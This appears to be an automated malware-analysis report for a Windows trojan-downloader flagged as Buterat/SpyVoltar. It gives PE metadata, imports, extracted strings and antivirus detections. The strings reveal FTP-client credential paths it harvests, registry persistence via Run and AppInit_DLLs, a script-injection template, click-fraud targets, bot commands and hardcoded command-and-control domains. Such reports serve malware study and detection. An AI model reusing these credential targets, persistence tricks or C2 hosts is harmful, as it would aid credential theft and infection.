Static Analysis

PE Compile Time

2012-12-02 15:38:18

PE Imphash

1db674aa41c8b017c09ab688b75ba41b

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000cc68 0x0000ce00 6.63491307637
.rdata 0x0000e000 0x0000210a 0x00002200 4.42315500058
.data 0x00011000 0x0001793c 0x00000200 3.61727362724

Imports

Library WININET.dll:
0x40e178 HttpSendRequestW
0x40e17c InternetConnectW
0x40e180 HttpOpenRequestW
0x40e188 InternetCloseHandle
0x40e190 InternetOpenW
0x40e194 InternetReadFile
0x40e19c InternetOpenUrlW
0x40e1a4 InternetSetOptionW
Library SHLWAPI.dll:
0x40e124 StrStrIW
0x40e128 PathMatchSpecW
0x40e12c PathCombineW
0x40e130 wvnsprintfW
0x40e134 StrStrIA
0x40e138 PathRemoveFileSpecW
Library KERNEL32.dll:
0x40e01c TerminateProcess
0x40e020 GetCurrentProcess
0x40e028 IsDebuggerPresent
0x40e02c GetVersionExA
0x40e030 GetFileSize
0x40e034 RtlUnwind
0x40e038 WideCharToMultiByte
0x40e03c MultiByteToWideChar
0x40e040 HeapCreate
0x40e044 CopyFileW
0x40e048 CreateThread
0x40e050 DeleteFileW
0x40e054 CreateProcessW
0x40e05c GetLastError
0x40e060 ExitProcess
0x40e064 LoadLibraryW
0x40e068 GetProcAddress
0x40e06c Sleep
0x40e070 VirtualProtect
0x40e080 SetFilePointer
0x40e084 SetEndOfFile
0x40e088 HeapAlloc
0x40e08c GetVersionExW
0x40e090 SetWaitableTimer
0x40e09c HeapFree
0x40e0a0 ReadFile
0x40e0a4 FindNextFileW
0x40e0a8 GetModuleFileNameW
0x40e0ac WaitForSingleObject
0x40e0b4 GetFileTime
0x40e0b8 CreateFileW
0x40e0bc GetTickCount
0x40e0c0 CloseHandle
0x40e0c4 GetFileSizeEx
0x40e0c8 VirtualFree
0x40e0cc GetProcessHeap
0x40e0d4 VirtualAlloc
0x40e0d8 HeapReAlloc
0x40e0dc GetSystemTime
0x40e0e0 VirtualQuery
0x40e0e4 FindClose
0x40e0e8 WriteFile
0x40e0ec GetLocalTime
0x40e0f0 FindFirstFileW
0x40e0f4 GetModuleHandleW
0x40e0f8 OpenMutexW
0x40e0fc GetCommandLineW
0x40e100 CreateMutexW
Library USER32.dll:
0x40e140 GetWindowLongW
0x40e144 DispatchMessageW
0x40e148 GetForegroundWindow
0x40e14c CharLowerW
0x40e150 CreateWindowExW
0x40e154 FindWindowW
0x40e158 PeekMessageW
0x40e15c SetForegroundWindow
0x40e160 GetSystemMetrics
0x40e164 MessageBoxW
0x40e168 SetWindowPos
0x40e16c SetWindowLongW
0x40e170 SetParent
Library ADVAPI32.dll:
0x40e000 RegCloseKey
0x40e004 RegOpenKeyExW
0x40e008 RegQueryValueExW
0x40e00c RegSetValueExW
0x40e010 RegCreateKeyExW
0x40e014 RegEnumKeyExW
Library SHELL32.dll:
0x40e11c SHGetFolderPathW
Library ole32.dll:
0x40e1ac CoCreateInstance
0x40e1b0 OleInitialize
0x40e1b4 CoInitialize
Library OLEAUT32.dll:
0x40e108 SysAllocString
0x40e10c VariantInit
0x40e110 SysFreeString
0x40e114 VariantClear
!This program cannot be run in DOS mode.
`.rdata
@.data
Vj VVV
QPQQj2
VPVVj8
GVPVVQ
QPQQj6
EpPSj-
EX9E\~
F;5TPA
t|f97tw
D$ ;D$
AAFFHu
QQSVW3
Pj"j^[S
Pj"j^[S
WShh=B
QWShHKA
Qj"j^^V
QVh ?B
QSVhxBB
QVhPAB
Qj"j^^V
QWVhH2A
Pj"j^[S
Pj"j^[S
QWSh`FB
Pj"j^[S
QWShXPA
Pj"j^[S
QWSh(MA
MpQWj^
Pj"j^^V
QVh(PA
QWVhP0B
QVh@=B
PVVj VVV
YYu9!D$
D$,vT2
ttSVj@P
YtFVh
t'h$PA
u%AAFFB;
URPQQhX
;t$,v-
UQPXY]Y[
VC20XC00U
Gu/wIu]JGu
Gu-JGu
4Gu BGu
zGu+IGu"
Gu_CGu
)IusAGuH
Iu~ZGu
TGuPIGu6
GuZFGu
DGu\?Gu
ZGuZDGuBDGu
ZGu5DGu
4GuQQGu#RGuLBGu
AtlAxWinInit
AtlAxAttachControl
AtlAxGetControl
;password=
;user=
;port=
;server=
__scMMdj490)0-Osd
InternetQueryDataAvailable
InternetOpenUrlW
InternetCloseHandle
InternetAttemptConnect
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
InternetSetOptionW
HttpOpenRequestW
InternetSetPerSiteCookieDecisionW
InternetClearAllPerSiteCookieDecisions
WININET.dll
StrStrIA
PathRemoveFileSpecW
StrStrIW
PathMatchSpecW
PathCombineW
wvnsprintfW
SHLWAPI.dll
DeleteFileW
CreateProcessW
SetUnhandledExceptionFilter
GetLastError
ExitProcess
LoadLibraryW
GetProcAddress
VirtualProtect
GetPrivateProfileIntW
ExpandEnvironmentStringsW
GetPrivateProfileStringW
SetFilePointer
SetEndOfFile
HeapAlloc
GetVersionExW
SetWaitableTimer
SystemTimeToFileTime
CreateWaitableTimerW
HeapFree
ReadFile
FindNextFileW
GetModuleFileNameW
WaitForSingleObject
GetTimeZoneInformation
GetFileTime
CreateFileW
GetTickCount
CloseHandle
GetFileSizeEx
VirtualFree
GetProcessHeap
GetCurrentDirectoryW
VirtualAlloc
HeapReAlloc
GetSystemTime
GetFileSize
FindClose
WriteFile
GetLocalTime
FindFirstFileW
GetModuleHandleW
OpenMutexW
GetCommandLineW
CreateMutexW
WaitForMultipleObjects
CreateThread
CopyFileW
HeapCreate
MultiByteToWideChar
WideCharToMultiByte
KERNEL32.dll
GetSystemMetrics
MessageBoxW
SetWindowPos
SetWindowLongW
PeekMessageW
GetWindowLongW
DispatchMessageW
GetForegroundWindow
CharLowerW
CreateWindowExW
FindWindowW
SetParent
SetForegroundWindow
USER32.dll
RegEnumKeyExW
RegCloseKey
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CoCreateInstance
OleInitialize
CoInitialize
ole32.dll
OLEAUT32.dll
RtlUnwind
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
GetVersionExA
VirtualQuery
&ref=%s&real_refer=%s
&real_refer=%s
&condition_id=
&kwtype=
&ref=%s
From: true
^client=
From:
lfolder
SOFTWARE\smartftp\client 2.0\settings\backup
personal favorites
SOFTWARE\smartftp\client 2.0\settings\general\favorites
Password
FavoriteItem
ftp*commander*
ftplist.txt
portnumber
SOFTWARE\martin prikryl\winscp 2\sessions
hostname
SOFTWARE\Far2\Plugins\ftp\hosts
SOFTWARE\Far\Plugins\ftp\hosts
*filezilla*
/*/*/Server
*ghisler*
*total*commander*
*totalcmd*
installdir
ftpininame
SOFTWARE\Ghisler\Total Commander
password
username
default
connections
wcx_ftp.ini
*flashfxp*
datafolder
SOFTWARE\FlashFXP\3
history.dat
quick.dat
sites.dat
yA36zA48dEhfrvghGRg57h5UlDv3
ftp://%S:%S@%S:%u
ftp://%s:%s@%s
ftp://%s:%s@%s:%u
PriorHost
TimeCorr
UniqueNum
http://
AppEvents\Schemes\Apps\Explorer\Navigating\.current
SOFTWARE\Classes\MIME\Database\Content Type\
text/html
application/x-javascript
text/javascript
SOFTWARE\Microsoft\Internet Explorer
JOB FILE
^nocrypt
Page generated at:
setvar
msec1970
b_nav_time
Software\Microsoft\Windows NT\CurrentVersion\Windows
AppInit_DLLs
C:\WINDOWS\system32\gbdwpbm.dll
var scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);
&host=
track_events
javascript
begun.ru/click.jsp?url=
an.yandex.ru/count
_blank
"domain"
"encrypted"
"condition_id"
"kwtype"
<domain>
</domain>
</url>
<title>
</title>
http://click0
Shell.Explorer
AtlAxWin
eventConn
Shell_TrayWnd
Accept: */*
Referer:
Accept-Language: ru-RU
Accept-Encoding: gzip, deflate
User-Agent:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%SystemRoot%\System32\%s.exe
%APPDATA%\%s.exe
/updatefile3
\netprotdrvss.exe
job^rev=%s^os=%s
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://gysopui.net/
http://gysopui.net/
begun.ru
confirm^rev=%s^code=%s^param=%s^os=%s
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
^rcn=1
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
LUXUPXML
SUPERPOISK
DIRECTST
LIVINETCH
UPDATE
DOWNRUN
CLIENTDEL
PRIORITYHOST
GRABFTPS
RECONNECT
COOKREJCT
DESTROY
No antivirus signatures available.
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Win32:Buterat-WQ [Trj]
C4S ClamAV (Linux) Win.Malware.Ulise-7170100-0
Trellix (Linux) GenericRXHT-PZ
Sophos Anti-Virus (Linux) Troj/Buterat-E
Bitdefender Antivirus (Linux) Generic.Dacic.1A7FA519.A.6CC4144B
G Data Antivirus (Windows) Virus: Generic.Dacic.1A7FA519.A.6CC4144B (Engine A), Win32.Trojan.PSE.14IDQ4O (Engine B)
WithSecure (Linux) Heuristic.HEUR/AGEN.1366724
ESET Security (Windows) a variant of Win32/SpyVoltar.B trojan
DrWeb Antivirus (Linux) BackDoor.Butirat.245
ClamAV (Linux) Clean
eScan Antivirus (Linux) Generic.Dacic.1A7FA519.A.6CC4144B(DB)
Kaspersky Standard (Windows) VHO:Trojan-Downloader.Win32.Agent.gen
Emsisoft Commandline Scanner (Windows) Generic.Dacic.1A7FA519.A.6CC4144B (B)
Cuckoo

We're processing your submission... This could take a few seconds.